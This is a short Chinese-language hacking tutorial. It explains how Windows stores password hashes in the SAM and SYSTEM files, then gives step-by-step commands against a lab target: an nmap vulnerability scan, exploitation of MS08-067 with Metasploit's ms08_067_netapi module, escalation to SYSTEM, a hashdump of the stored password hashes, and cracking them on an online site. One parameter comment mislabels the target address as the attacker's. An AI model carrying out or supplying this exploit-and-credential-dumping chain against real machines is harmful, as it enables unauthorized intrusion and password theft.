一.windows密码与哈希
1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件
A.SAM文件:储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文
B.SYSTEM文件:密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希值
我们使用反编译技术就可以获得密码
二.实战(利用ms08-067)
1.使用nmap扫描目标靶机(靶机ip)
nmap --script=vuln 192.168.1.183
发现目标存在ms08-067漏洞
2.启动渗透利用框架
metasploit
3.搜索该漏洞
search ms08-067
4.使用攻击模块
use exploit/windows/smb/ms08_067_netapi
5.显示要设置的参数
show options
6.设置参数(kali ip)
set RHOSTS 192.168.1.176
7.执行
run
8.查看权限
getuid
如管显示是SYSTEM就可以,否则输入getsystem直到显示SYSTEM
9.下载目标一次解密的密码
hashdump
复制密文
10.cmd5网站解密
www.cmd5.com